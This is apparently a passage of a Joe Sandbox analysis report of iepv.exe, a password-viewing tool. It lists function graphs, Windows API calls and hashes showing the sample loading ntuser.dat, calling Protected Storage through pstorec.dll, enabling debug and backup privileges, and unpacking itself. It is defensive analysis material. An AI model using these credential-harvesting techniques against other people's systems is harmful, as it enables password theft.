                                        • RegCloseKey.ADVAPI32(?,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 00407145
                                        • RegUnLoadKeyA.ADVAPI32(80000002,$NIRSOFT_IEPV_KEY$,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 00407155
                                          • Part of subcall function 00405918: _mbscpy.MSVCRT(?,?,?,00403438,?,Application Data\Microsoft\Protect,?,?,?,00000000,00402C40,?), ref: 00405920
                                          • Part of subcall function 00405918: _mbscat.MSVCRT ref: 0040592F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Loadstrlen$ByteCharCloseMultiOpenWide_mbscat_mbscpy_wcslwrmemsetwcslen
                                        • String ID: $NIRSOFT_IEPV_KEY$$/$/$ntuser.dat
                                        • API String ID: 2025462591-835937672
                                        • Opcode ID: 37bd4403ce09373d63c1f516d04b7e43716adbd205a2cd39e1f06fcbdff7aa7e
                                        • Instruction ID: ead2737e8e6220596dc6ee0efdb618599277858d08f9b0aa3e170f90a4b6c739
                                        • Opcode Fuzzy Hash: 37bd4403ce09373d63c1f516d04b7e43716adbd205a2cd39e1f06fcbdff7aa7e
                                        • Instruction Fuzzy Hash: 47518671900118AACB14EF55CC85EDAB7B8EF44304F14447BFA0AFB192D778AE85CB99
                                        Function 0040D4FC Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 112 40d4fc-40d518 call 40d6e8 GetModuleHandleA 115 40d539-40d53c 112->115 116 40d51a-40d525 112->116 118 40d565-40d5b2 __set_app_type __p__fmode __p__commode call 408af3 115->118 116->115 117 40d527-40d530 116->117 119 40d551-40d555 117->119 120 40d532-40d537 117->120 127 40d5c0-40d61a call 40d6d4 _initterm __getmainargs _initterm 118->127 128 40d5b4-40d5bf __setusermatherr 118->128 119->115 123 40d557-40d559 119->123 120->115 122 40d53e-40d545 120->122 122->115 125 40d547-40d54f 122->125 126 40d55f-40d562 123->126 125->126 126->118 131 40d656-40d659 127->131 132 40d61c-40d624 127->132 128->127 135 40d633-40d637 131->135 136 40d65b-40d65f 131->136 133 40d626-40d628 132->133 134 40d62a-40d62d 132->134 133->132 133->134 134->135 137 40d62f-40d630 134->137 138 40d639-40d63b 135->138 139 40d63d-40d64e GetStartupInfoA 135->139 136->131 137->135 138->137 138->139 140 40d650-40d654 139->140 141 40d661-40d663 139->141 142 40d664-40d678 GetModuleHandleA call 40b97b 140->142 141->142 145 40d681-40d6c1 _cexit call 40d721 142->145 146 40d67a-40d67b exit 142->146 146->145
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                        • String ID:
                                        • API String ID: 3662548030-0
                                        • Opcode ID: 6df737577507be7e67fc6c5be6bf1cb133c8ccb648732551b8eced2d8bd4cc48
                                        • Instruction ID: 428b8c0729d8d1ad6d4a6f02f33f5e4280a30d90fc79a33d0819ea2038a00576
                                        • Opcode Fuzzy Hash: 6df737577507be7e67fc6c5be6bf1cb133c8ccb648732551b8eced2d8bd4cc48
                                        • Instruction Fuzzy Hash: 5A418B70C00254DFCB20AFE5D944AAD7BB4AB04314F24097BE555B72E1D7794886CF5D
                                        Function 0040AE0F Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 186 40ae0f-40ae25 187 40ae2b-40ae69 memset GetModuleFileNameA strrchr 186->187 188 40aeec-40aef0 186->188 189 40ae6b 187->189 190 40ae6e-40aeda _mbscat _mbscpy * 2 call 401a30 call 4017ea 187->190 189->190 194 40aedf-40aee7 call 4082d1 190->194 194->188
                                        APIs
                                        • memset.MSVCRT ref: 0040AE40
                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040AE51
                                        • strrchr.MSVCRT ref: 0040AE60
                                        • _mbscat.MSVCRT ref: 0040AE7A
                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AEAE
                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AEBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FileModuleName_mbscatmemsetstrrchr
                                        • String ID: .cfg$General
                                        • API String ID: 556121754-1188829934
                                        • Opcode ID: 5137b276071cd748732b395deb669b979b0f3f0ad1264ed1abebc979dbc7320f
                                        • Instruction ID: 2e23dc87211df01c5a59ffa16cb291305880bb2efea795ae7a23b1e77d593d6d
                                        • Opcode Fuzzy Hash: 5137b276071cd748732b395deb669b979b0f3f0ad1264ed1abebc979dbc7320f
                                        • Instruction Fuzzy Hash: 7B2175769042185BDB21DBA5CC85BCA77AC9F54304F4400F6F548B71C2DAB85BC98BA9
                                        Function 00402454 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 161stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 196 402454-402479 call 4058e3 199 40247b-402481 196->199 200 40248d-402497 196->200 201 402483-402487 199->201 202 40248b 199->202 203 402669-402673 200->203 204 40249d-4024c1 call 405f50 200->204 201->204 205 402489 201->205 202->200 202->204 207 402675-402679 203->207 208 402698-40269e 203->208 212 4024c7-40253f memset * 2 call 405780 strlen * 2 204->212 213 4025f9-402602 204->213 205->202 207->208 209 40267b-40268a call 40c8ba 207->209 209->208 218 40268c-402693 call 40c974 call 40c91f 209->218 225 402541-402559 call 405918 212->225 226 40255b 212->226 215 402660-402664 call 405f72 213->215 216 402604-402608 213->216 215->203 219 402654-40265b call 4065c1 216->219 220 40260a-402652 call 40269f call 402c18 call 40337e 216->220 218->208 219->215 220->215 231 402560-402570 call 406165 225->231 226->231 238 402572-402578 231->238 239 4025de-4025e9 call 406f24 231->239 241 40257a 238->241 242 40257f-4025a0 memset 238->242 246 4025ee-4025f7 call 4060d5 239->246 241->242 245 4025a3-4025b9 call 405ed3 242->245 251 4025da 245->251 252 4025bb-4025c3 245->252 246->213 251->239 252->245 253 4025c5-4025d8 call 405f98 252->253 253->245
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$strlen$Version
                                        • String ID: ;$iepv_sites.txt
                                        • API String ID: 855378092-1428769095
                                        • Opcode ID: 0a97538181482b65033f9bd75b0d00f09e17057bed307871aee19192e7db998c
                                        • Instruction ID: 89de805b4b800a14570b5b4f4e489c6d16acd4f32d64f962d32b26a750c95b2a
                                        • Opcode Fuzzy Hash: 0a97538181482b65033f9bd75b0d00f09e17057bed307871aee19192e7db998c
                                        • Instruction Fuzzy Hash: 7D51A5715083409FC720DF55C989B9B77D8AF85319F04097FE888AB1D2DBB8A548CB9B
                                        Function 0040CEF4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 256 40cef4-40cf0b call 40cec5 259 40cf0d-40cf16 call 4058e3 256->259 260 40cf1f-40cf56 memset RegOpenKeyExA 256->260 268 40cf1d 259->268 261 40cf58-40cf7b call 40cc83 RegCloseKey 260->261 262 40cf7c-40cf8f _mbscpy 260->262 261->262 265 40cf92-40cf94 262->265 268->265
                                        APIs
                                          • Part of subcall function 0040CEC5: LoadLibraryA.KERNEL32(shell32.dll,0040CF03), ref: 0040CED3
                                          • Part of subcall function 0040CEC5: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040CEE8
                                        • memset.MSVCRT ref: 0040CF32
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,-k@), ref: 0040CF4E
                                        • RegCloseKey.ADVAPI32(?,?), ref: 0040CF75
                                        • _mbscpy.MSVCRT(00000000,?), ref: 0040CF84
                                          • Part of subcall function 004058E3: GetVersionExA.KERNEL32(00412058,?,00402475), ref: 004058FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressCloseLibraryLoadOpenProcVersion_mbscpymemset
                                        • String ID: -k@$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 3832957303-19275265
                                        • Opcode ID: 59764fbecf4f9bc4bb1cc1dc9d5b2a857306505f74ec8d85b028d3ff1110afd3
                                        • Instruction ID: 02097c9190c13c1cade43920a8194b229b9bf51379d27b2412ab95ef5e249dda
                                        • Opcode Fuzzy Hash: 59764fbecf4f9bc4bb1cc1dc9d5b2a857306505f74ec8d85b028d3ff1110afd3
                                        • Instruction Fuzzy Hash: 4601D6B2804118FEE700A7A0ECC6DDA77BCDB08304F10007AFA05F10D2DA786EA49A69
                                        Function 0040A274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 269 40a274-40a286 270 40a2d3-40a2e7 call 4053d7 269->270 271 40a288-40a29e call 40631f _strcmpi 269->271 294 40a2e9 call 40c8a3 270->294 295 40a2e9 call 402454 270->295 296 40a2e9 call 405476 270->296 297 40a2e9 call 40c8ba 270->297 276 40a2a0-40a2b9 call 40631f 271->276 277 40a2c7-40a2d1 271->277 283 40a2c0 276->283 284 40a2bb-40a2be 276->284 277->270 277->271 278 40a2ec-40a2ff call 40632f 285 40a301-40a30d 278->285 286 40a344-40a353 SetCursor 278->286 287 40a2c1-40a2c2 call 409d09 283->287 284->287 289 40a324-40a341 call 4080eb qsort 285->289 290 40a30f-40a31a 285->290 287->277 289->286 290->289 294->278 295->278 296->278 297->278
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Cursor_strcmpiqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 3665648111-1578091866
                                        • Opcode ID: d904ca78c6bce7c4487f777234176b1b3890c6aa45b1dd85959794c0237fdfe6
                                        • Instruction ID: 670274951613ec97810711a729b30285552b6fe39b2307887bc7300b9efbbc60
                                        • Opcode Fuzzy Hash: d904ca78c6bce7c4487f777234176b1b3890c6aa45b1dd85959794c0237fdfe6
                                        • Instruction Fuzzy Hash: 7A21D731610601AFD719AB75D881A96B7A8FF44318F10057EF819AB3D2C7B9BC21CB99
                                        Function 00418F70 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 298 418f70-418f80 299 418f92-418f97 298->299 300 418f99 299->300 301 418f88-418f8d 300->301 302 418f9b 300->302 303 418f8e-418f90 301->303 304 418fa0-418fa2 302->304 303->299 303->300 305 418fa4-418fa9 304->305 306 418fab-418faf 304->306 305->306 306->304 307 418fb1 306->307 308 418fb3-418fba 307->308 309 418fbc-418fc1 307->309 308->304 308->309 310 418fd0-418fd2 309->310 311 418fc3-418fcc 309->311 314 418fd4-418fd9 310->314 315 418fdb-418fdf 310->315 312 419042-419045 311->312 313 418fce 311->313 316 41904a-41904d 312->316 313->310 314->315 317 418fe1-418fe6 315->317 318 418fe8-418fea 315->318 319 41904f-419051 316->319 317->318 320 41900c-41901b 318->320 321 418fec 318->321 319->316 324 419053-419056 319->324 322 41901d-419024 320->322 323 41902c-419039 320->323 325 418fed-418fef 321->325 322->322 326 419026 322->326 323->323 327 41903b-41903d 323->327 324->316 328 419058-419074 324->328 329 418ff1-418ff6 325->329 330 418ff8-418ffc 325->330 326->303 327->303 328->319 331 419076 328->331 329->330 330->325 332 418ffe 330->332 333 41907c-419080 331->333 334 419000-419007 332->334 335 419009 332->335 336 419082-419098 LoadLibraryA 333->336 337 4190c7-4190f7 VirtualProtect * 2 333->337 334->325 334->335 335->320 339 419099-41909e 336->339 338 4190fb-4190ff 337->338 338->338 340 419101 338->340 339->333 341 4190a0-4190a2 339->341 342 4190a4-4190aa 341->342 343 4190ab-4190b8 GetProcAddress 341->343 342->343 344 4190c1 ExitProcess 343->344 345 4190ba-4190bf 343->345 345->339
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82d01f8de0d6b83746cc5af3166027bd973502d4ba97b1444f9348d97f978b90
                                        • Instruction ID: e6a751755948d32e7659ffd31eab708cc562b9c5aa0d5194796b1d1ca4562b11
                                        • Opcode Fuzzy Hash: 82d01f8de0d6b83746cc5af3166027bd973502d4ba97b1444f9348d97f978b90
                                        • Instruction Fuzzy Hash: 47512471A402524BC7205EB88C906F1BB95EB46334B2C073ED5E6C73C6EBAC5C878769
                                        Function 0040B69D Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 346 40b69d-40b6c7 ??2@YAPAXI@Z 347 40b6c9-40b6d9 346->347 348 40b6db 346->348 349 40b6dd-40b6f0 ??2@YAPAXI@Z 347->349 348->349 350 40b6f2-40b6f7 call 402871 349->350 351 40b6f9 349->351 353 40b6fb-40b739 350->353 351->353 355 40b748-40b781 call 4058bd call 401000 GetModuleHandleA LoadIconA call 4016f8 353->355 356 40b73b-40b742 DeleteObject 353->356 356->355
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000022C,?,?,?,00000000,0040BA1D), ref: 0040B6BF
                                        • ??2@YAPAXI@Z.MSVCRT(000007AC,?,?,?,00000000,0040BA1D), ref: 0040B6E8
                                        • DeleteObject.GDI32(?), ref: 0040B73C
                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,00000000,0040BA1D), ref: 0040B764
                                        • LoadIconA.USER32(00000000,00000065), ref: 0040B76D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                        • String ID:
                                        • API String ID: 659443934-0
                                        • Opcode ID: a34512965d740be2f92f93442cb6461821fecfa4af94fab930e3484fbdfde6f5
                                        • Instruction ID: 7879ec44466ce053b42f30ac7fc69db405e56ad81a0ce3f36107cfb098ef8f5e
                                        • Opcode Fuzzy Hash: a34512965d740be2f92f93442cb6461821fecfa4af94fab930e3484fbdfde6f5
                                        • Instruction Fuzzy Hash: BA216DB19053889FDB30AF768D887D97BA8FB04305F14497FE90CAB281CB7996048B59
                                        Function 0040B81A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 363 40b81a-40b874 call 401e6e call 40a46e 368 40b87a-40b898 call 40631f _strcmpi 363->368 369 40b96f-40b97a 363->369 372 40b89a-40b89c 368->372 373 40b89e-40b8a5 call 40b784 368->373 374 40b8a7-40b8ae 372->374 373->374 377 40b8b2-40b8bf 373->377 374->377 377->368 378 40b8c1-40b8c6 377->378 378->369 379 40b8cc-40b90e call 40ae0f call 40a274 call 40631f call 409732 378->379 387 40b913-40b91f 379->387 387->369 388 40b921-40b96e call 40c91f call 4067fd call 408211 ??3@YAXPAX@Z 387->388 388->369
                                        APIs
                                        • _strcmpi.MSVCRT ref: 0040B88F
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000), ref: 0040B969
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@_strcmpi
                                        • String ID: /stext$bq@
                                        • API String ID: 3410402764-2864633008
                                        • Opcode ID: 701c4cffa4f4c57ab24c378e8b1ade68062158e79011fd1904830dd9c2812433
                                        • Instruction ID: aab031a9e4051bdb1d4ca8340b8679169eeb1727090a0769a58e235016f270db
                                        • Opcode Fuzzy Hash: 701c4cffa4f4c57ab24c378e8b1ade68062158e79011fd1904830dd9c2812433
                                        • Instruction Fuzzy Hash: 1E4169756147069FC305EF66C480A9AF7E8FF44304F008A7EF858AB391DB78A9148BD9
                                        Function 0040C8BA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 395 40c8ba-40c8d6 call 40c8a3 LoadLibraryA 398 40c8f2-40c8fb call 40c8a3 395->398 399 40c8d8-40c8f0 GetProcAddress 395->399 399->398 400 40c8fc-40c90a 399->400 404 40c915-40c91e call 40c8a3 400->404 405 40c90c-40c914 400->405
                                        APIs
                                          • Part of subcall function 0040C8A3: FreeLibrary.KERNELBASE(?,0040C8C6), ref: 0040C8AF
                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 0040C8CB
                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040C8DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: PStoreCreateInstance$pstorec.dll
                                        • API String ID: 145871493-2881415372
                                        • Opcode ID: 16f6b68425b54251d349bf04f383eb1ced9b10433ff9902e5fd27ea8f5497a9c
                                        • Instruction ID: 4312a112b4f741766ab58ba89a4ab5ec840b01acab9ca869d30e20775c1cc4ea
                                        • Opcode Fuzzy Hash: 16f6b68425b54251d349bf04f383eb1ced9b10433ff9902e5fd27ea8f5497a9c
                                        • Instruction Fuzzy Hash: 09F030722047129AEA307B7ABC95B9632D45F40726F11CB3EB066F55D0DFBCD5408B58
                                        Function 00409E6B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 408 409e6b-409e9f call 40bfa0 * 3 415 409ea1-409ea4 FreeLibrary 408->415 416 409eaa-409eab 408->416 415->416
                                        APIs
                                          • Part of subcall function 0040BFA0: GetCurrentProcess.KERNEL32(?), ref: 0040BFAF
                                          • Part of subcall function 0040BFA0: GetLastError.KERNEL32(00000000), ref: 0040BFC1
                                          • Part of subcall function 0040BFA0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040BFE1
                                          • Part of subcall function 0040BFA0: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0040BFEF
                                          • Part of subcall function 0040BFA0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040C015
                                          • Part of subcall function 0040BFA0: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 0040C026
                                          • Part of subcall function 0040BFA0: GetLastError.KERNEL32(00000000), ref: 0040C028
                                          • Part of subcall function 0040BFA0: CloseHandle.KERNELBASE(?), ref: 0040C033
                                        • FreeLibrary.KERNEL32(00000000,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege), ref: 00409EA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressErrorLastProc$AdjustCloseCurrentFreeHandleLibraryLookupPrivilegePrivilegesProcessTokenValue
                                        • String ID: SeBackupPrivilege$SeDebugPrivilege$SeRestorePrivilege
                                        • API String ID: 1186303178-2063704729
                                        • Opcode ID: c39a57303e2dcd7e791885a6256a434993ab449bfce4c4de97d775ddd86f6816
                                        • Instruction ID: 424e39be73d6100c90b7e44ed4ec4fb37d7a288e5393288de226c7397ddeed65
                                        • Opcode Fuzzy Hash: c39a57303e2dcd7e791885a6256a434993ab449bfce4c4de97d775ddd86f6816
                                        • Instruction Fuzzy Hash: 1FE09A7055420DFADB08EB62DD47B8D7278EB00709F6004BAA000B21E59BBD6F689A9C
                                        Function 0040CB91 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040CBBA
                                          • Part of subcall function 00405D12: sprintf.MSVCRT ref: 00405D4A
